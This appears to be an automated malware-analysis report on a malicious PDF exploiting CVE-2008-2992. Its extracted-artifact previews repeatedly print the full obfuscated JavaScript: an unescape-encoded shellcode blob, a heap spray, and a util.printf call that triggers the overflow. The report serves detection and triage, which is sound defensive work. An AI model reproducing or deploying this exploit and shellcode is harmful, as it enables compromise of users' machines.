MALICIOUS
268
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_UNESCAPE. The JavaScript stream, named javascript_obj0013_001.js, is obfuscated and likely intended to download and execute a second-stage payload. The presence of Scribus metadata suggests a potential vector for document creation, but the primary malicious activity is driven by the embedded script.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 7
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13" + -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTHA PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 6
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x3DC | 2774 bytes |
SHA-256: b11ae0254db1c22cd1a9cf8aa3153f4b404c1fd07c9c61394532f057d61892b8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13" +
"%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41" +
"%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8" +
"%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35" +
"%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD" +
"%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81" +
"%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA" +
"%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD" +
"%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F" +
"%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7" +
"%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466" +
"%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E" +
"%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9" +
"%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE" +
"%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9" +
"%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED" +
"%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9" +
"%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB" +
"%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7" +
"%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6" +
"%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7" +
"%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0" +
"%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57" +
"%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41" +
"%u0A23%u3914%u172A%u9742");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
|
|||
javascript_obj0013_002.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x402 | 3410 bytes |
SHA-256: 72f95eb096db6c331b8e1cf7d4f1855d077c18fb1703fcdf18dde01b8989a05d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13" +
"%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41" +
"%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8" +
"%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35" +
"%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD" +
"%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81" +
"%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA" +
"%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD" +
"%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F" +
"%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7" +
"%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466" +
"%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E" +
"%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9" +
"%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE" +
"%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9" +
"%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED" +
"%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9" +
"%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB" +
"%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7" +
"%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6" +
"%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7" +
"%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0" +
"%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57" +
"%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41" +
"%u0A23%u3914%u172A%u9742");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x3DC | 2021 bytes |
SHA-256: b7cf4af470aa72e5fa5dcbe476d2f9b290951c6a8f22c257cd1e72c096a19fc3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41%u0A23%u3914%u172A%u9742");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x402 | 2657 bytes |
SHA-256: 0ac7fa20ee778bcf01bc252a4bf5911f4418580b05c292e52175df92d2dce047 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41%u0A23%u3914%u172A%u9742");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
generic_stage_recovery_002.js |
deobfuscated-js | generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0x11 | 4699 bytes |
SHA-256: 1993e9f40c36ecbb2d1ddd1f94d889f12e9540e53d3372ef7a373ff190f441d1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41%u0A23%u3914%u172A%u9742");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41%u0A23%u3914%u172A%u9742");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
combined_document_js_000.js |
deobfuscated-js | combined document JavaScript streams at offset 0x11 | 6205 bytes |
SHA-256: fafc0edc5b43e14970a0c125572e69594a25147110673ccfd89fb12c865e8d68 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13" +
"%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41" +
"%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8" +
"%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35" +
"%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD" +
"%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81" +
"%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA" +
"%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD" +
"%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F" +
"%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7" +
"%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466" +
"%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E" +
"%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9" +
"%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE" +
"%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9" +
"%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED" +
"%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9" +
"%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB" +
"%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7" +
"%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6" +
"%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7" +
"%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0" +
"%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57" +
"%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41" +
"%u0A23%u3914%u172A%u9742");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13" +
"%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41" +
"%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8" +
"%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35" +
"%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD" +
"%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81" +
"%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA" +
"%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD" +
"%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F" +
